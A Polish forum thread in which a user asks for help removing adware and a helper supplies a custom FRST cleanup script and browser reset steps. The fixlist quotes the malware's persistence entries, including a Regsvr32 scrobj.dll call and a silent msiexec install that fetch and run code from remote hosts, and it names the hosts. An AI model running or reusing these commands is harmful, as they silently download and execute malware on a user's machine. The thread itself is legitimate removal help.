potlowski Opublikowano 29 Maja 2017 Zgłoś Udostępnij Opublikowano 29 Maja 2017 Dzień dobry, nie mogę poradzić sobie ze zlokalizowaniem i usunięciem wirusa, który instaluje na moim komputerze pliki Big Farm i Big Bang Empire, przeglądarkę Chrome (nie korzystam z niej na co dzień) oraz powoduje, że w Firefox pojawia się mnóstwo reklam/okienek. W momencie, w którym wirus instaluje pliki, system Windows bardzo zwalnia, wiesza się, wyłącza się przeglądarka i antywirus AVG (nie można go w tym czasie ponownie uruchomić). Dodam, że żaden z tych plików oczywiście nie pokazuje się w "programy" Windows, można usunąć jedynie ikonę, a ręczna próba usunięcia Firefox/Chrome skończyła się fiaskiem, ponieważ system odmawia dostępu... Próbowałem przez ostatnie 3 tygodnie codziennie czyścić komputer antywirusem i AdwCleanerem, odinstalować Firefox, ale bezskutecznie. Wymagane logi wrzucam w załącznikach. Proszę o pomoc. Addition.txt FRST.txt GMER.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 29 Maja 2017 Zgłoś Udostępnij Opublikowano 29 Maja 2017 System jest zainfekowany przez adware. Widoczne są dwie fałszywki Mozilli FireFox oraz Google Chrome (= choć nie ma oryginalnej wersji). Nie będę się rozpisywać, bo codziennie widzę tu to samo. Portale z oprogramowaniem / Instalatory - na co uważać 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\ChromeHTML: -> Task: {0C1573E6-EB72-4A0D-B905-E6C7F9C00BF2} - System32\Tasks\{D3350727-1A18-45FF-9650-FE53F21D8DB2} => pcalua.exe -a C:\Users\MAGDA\AppData\Local\Temp\{18E20274-F8B2-4061-934E-E94E4F113858}\InstallFlashPlayer.exe -d C:\Users\MAGDA\AppData\Local\Temp\ICD1.tmp -c -iv 6 Task: {E1EE3ED7-C883-4490-878D-07DB4A475E93} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== scrobj.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Bangtony RemoveDirectory: C:\Users\MAGDA\AppData\Local\Bangtony RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Bangtony FirewallRules: [{E980C772-4A40-40FF-8818-542C65790C55}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe FirewallRules: [{27FC16EC-FFB1-4520-9657-903708EE55B9}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe FirewallRules: [{F76C0C47-6098-4C47-BFF2-D79F08D068BE}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe FirewallRules: [{F5CB7DEC-6781-44FD-867F-C35B93477FAC}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe FirewallRules: [{D5CF5E93-C38C-43BA-AAED-B6B1F3D663F0}] => (Allow) C:\Program Files (x86)\Bangtony\Application\chrome.exe FirewallRules: [{17AA0B84-A7C8-4140-B2BF-336ADA96EDEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{77E9E3FC-75B2-4FF6-A776-0532C8B8AC4F}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\MAGDA\AppData\Local\Firefox RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Firefox HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== /q IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe GroupPolicy\User: Ograniczenia GroupPolicyUsers\S-1-5-21-266744301-1538140241-1666147108-1003\User: Ograniczenia SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> {E88E0043-C9D4-4e33-8555-FEE4F5B63060} URL = hxxp://go.mail.ru/search?q={searchTerms}&utf8in=1&fr=ietb BHO-x32: Brak nazwy -> {8984B388-A5BB-4DF7-B274-77B879E179DB} -> Brak pliku BHO-x32: Brak nazwy -> {b18906df-1dfa-4d50-8a1f-7d076a8c87b7} -> Brak pliku Toolbar: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> Brak nazwy - {09900DE8-1DCA-443F-9243-26FF581438AF} - Brak pliku R2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp [210946 ] () [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [93696 2017-05-26] () [brak podpisu cyfrowego] S1 MpKsl609328ae; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{15547DD3-66D3-4FC6-A0C8-D0267EAC43CD}\MpKsl609328ae.sys [X] R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp 2017-05-29 07:14 - 2017-05-29 07:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Witryna Sage.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia Handel - Stacja robocza.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Aktywacja.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Elektroniczne zgłoszenie problemu.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Symfonia Handel - Stacja robocza.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Umowa licencyjna.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Word\aneks_pol%20levant305943631758176149\aneks_pol%20levant.doc.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Excel\03%20kwiecień%202017305869361454104687\03%20kwiecień%202017.xls.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\MAGDA\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox. Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Mozilla FireFox. To wymagany krok to kasacji modyfikacji infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bangtony;firefox;biaoJi Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Sprawdź czy AdwCleaner coś wykrywa. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport znajdujący się w C:\AdwCleaner. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
potlowski Opublikowano 30 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 30 Maja 2017 Dziękuję! Zrobiłem wszystko zgodnie z instrukcją. Wrzucam nowe pliki. SearchReg.txt Shortcut.txt Addition.txt AdwCleanerS8.txt Fixlog.txt FRST.txt Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się